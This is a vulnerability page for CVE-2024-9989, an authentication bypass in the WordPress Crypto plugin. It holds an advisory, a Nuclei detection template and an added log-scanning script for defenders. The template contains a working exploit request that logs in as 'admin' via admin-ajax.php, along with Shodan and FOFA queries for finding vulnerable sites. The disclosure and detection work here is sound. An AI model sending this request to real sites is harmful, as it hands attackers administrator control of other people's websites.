The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to a limited arbitrary method call to the 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
PoC code [public]
id: CVE-2024-9989

info:
  name: Crypto <= 2.15 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to a limited arbitrary method call to the 'crypto_connect_ajax_process::log_in' function in the 'crypto_connect_ajax_process' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
  impact: |
    Unauthenticated attackers can bypass authentication to log in as any existing user including administrators if they know the username, gaining complete control of the WordPress site and all its data.
  remediation: |
    Update Crypto plugin to a version later than 2.15 that properly restricts and validates method calls in the crypto_connect_ajax_process function.
  reference:
    - https://github.com/wy876/POC/blob/main/WordPress/WordPress%E6%8F%92%E4%BB%B6Crypto%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0(CVE-2024-9989).md
    - https://mp.weixin.qq.com/s/hC8A1DeS-LWGpNIFKeiMBQ
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e21bd924-1d96-4371-972a-5c99d67261cc?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9989
    - https://github.com/advisories/GHSA-hmfh-w3mx-w6j4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9989
    cwe-id: CWE-288
    epss-score: 0.92504
    epss-percentile: 0.99724
    cpe: cpe:2.3:a:odude:crypto_tool:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: odude
    product: crypto_tool
    framework: wordpress
    shodan-query: http.html:"wp-content/plugins/crypto"
    fofa-query: body="wp-content/plugins/crypto"
  tags: cve,cve2024,wordpress,wp,wp-plugin,crypto,auth-bypass,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/crypto")'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register&param1=admin HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: set_cookie
        words:
          - "wordpress_sec_"
          - "wordpress_logged_in_"
        condition: or

      - type: word
        part: body
        words:
          - "error"
          - "false"
          - "success"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f4436aa09450047c102902b92520181593c18dc75caf48c9d9a1b7ab782d2e4b022068322ad846129637a1772e35e923fa9e4be4c421a4adab8e17d007331d48a3b2:922c64590222798bb761d5b6d8e72950
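As an added defender-side example (not part of the original page or of the Nuclei template above), the following Python scans web server access log lines in combined format for the request pattern the template sends: a GET to admin-ajax.php with action=crypto_connect_ajax_process, flagging the method names the advisory and template name (log_in, register) as high severity and any other method name on that action as informational. The log lines, IP addresses and the method name "get_status" are constructed sample data.

```python
"""Flag CVE-2024-9989 exploitation attempts in WordPress access logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format: client, timestamp, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

ACTION = "crypto_connect_ajax_process"          # AJAX action from the template
HIGH_RISK_METHODS = {"log_in", "register"}      # named in the advisory and template

def classify(line):
    """Return a finding dict if the line targets the vulnerable AJAX action, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query)                  # parse_qs URL-decodes the values
    if qs.get("action", [""])[0] != ACTION:
        return None                             # POST bodies are not in access logs
    method_name = qs.get("method_name", [""])[0]
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": int(m.group("status")),
        "method_name": method_name,
        "param1": qs.get("param1", [""])[0],    # the username supplied by the caller
        "severity": "high" if method_name in HIGH_RISK_METHODS else "info",
    }

def scan(lines):
    """Run classify over an iterable of log lines and return the findings in order."""
    return [f for f in (classify(line) for line in lines) if f]

# Constructed sample log lines: one template-style probe, one other call to the same
# action, and two benign requests.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Oct/2024:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register&param1=admin HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2024:12:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=get_status HTTP/1.1" 200 80 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2024:12:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2024:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

Access logs only expose the query string, so the same parameters sent in a POST body are invisible to this check; pair it with a WAF or application-level rule that inspects request bodies for the action and method_name values.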